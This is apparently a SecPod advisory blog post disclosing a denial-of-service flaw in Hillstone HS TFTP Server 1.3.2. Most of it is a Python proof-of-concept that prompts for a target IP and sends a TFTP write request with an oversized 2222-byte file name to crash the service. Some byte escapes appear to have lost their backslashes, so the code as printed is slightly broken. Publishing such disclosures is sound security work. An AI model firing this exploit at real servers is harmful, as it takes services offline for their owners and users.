SecPod Research Team member (Prabhu S Angadi) has found Denial Of Service Vulnerability in Hillstone Software HS TFTP Server. The vulnerability is caused due to improper validation of WRITE/READ Request Parameter containing long file name. The flaw can be exploited to crash the service but can be stopped using a vulnerability management tool.
Also, a patch management solution can patch this flaw.
POC : Download here.
More information on the flaws can be found here.
#!/usr/bin/python
##############################################################################
# Title : Hillstone Software HS TFTP Server Denial Of Service Vulnerability
# Author : Prabhu S Angadi from SecPod Technologies (www.secpod.com)
# Vendor : http://www.hillstone-software.com/hs_tftp_details.htm
# Advisory : https://www.secpod.com/blog/?p=419
# http://secpod.org/advisories/SecPod_Hillstone_Software_HS_TFTP_Server_DoS.txt
# http://secpod.org/exploits/SecPod_Exploit_Hillstone_Software_HS_TFTP_Server_DoS.py
# Version : Hillstone Software HS TFTP 1.3.2
# Date : 02/12/2011
##############################################################################
import socket,sys,time
port = 69
target = raw_input("Enter host/target ip address: ")
if not target:
print "Host/Target IP Address is not specified"
sys.exit(1)
print "you entered ", target
try:
socket.inet_aton(target)
except socket.error:
print "Invalid IP address found ..."
sys.exit(1)
try:
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
except:
print "socket() failed"
sys.exit(1)
## File name >= 222 length leads to crash
exploit = "x90" * 2222
mode = "binary"
print "File name WRITE/READ crash"
## WRITE command = x00x02
data = "x00x02" + exploit + "" + mode + ""
## READ command = x00x01
## data = "x00x01" + exploit + "" + mode + ""
sock.sendto(data, (target, port))
time.sleep(2)
sock.close()
try:
sock.connect()
except:
print "Remote TFTP server port is down..."
sys.exit(1)
Welcome any feedback or suggestion.
Cheers!
SecPod Research Team